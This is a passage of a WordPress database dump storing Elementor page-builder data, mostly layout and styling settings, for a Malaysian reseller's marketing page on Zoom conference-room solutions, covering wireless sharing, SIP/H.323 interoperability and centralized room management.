featuring screen sharing, white boarding, and co-annotation\\u00a0 all at the tip of your fingers.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d2912a1\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/gezS90Pg_fk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d565e7b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c28793b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29d7347\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6297,3066,'_elementor_version','2.5.4'),(8321,3620,'_elementor_edit_mode','builder'),(6301,3067,'_wp_page_template','template-fullwidth.php'),(6302,3067,'_elementor_edit_mode','builder'),(6303,3067,'_elementor_template_type','post'),(6304,3067,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6305,3067,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6457ddc\",\"elType\":\"section\",\"settings\":{\"structure\":\"33\"},\"elements\":[{\"id\":\"bdc71a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3abc915\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1901198\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/yRQGXlJS-xI\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"bcb7227\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"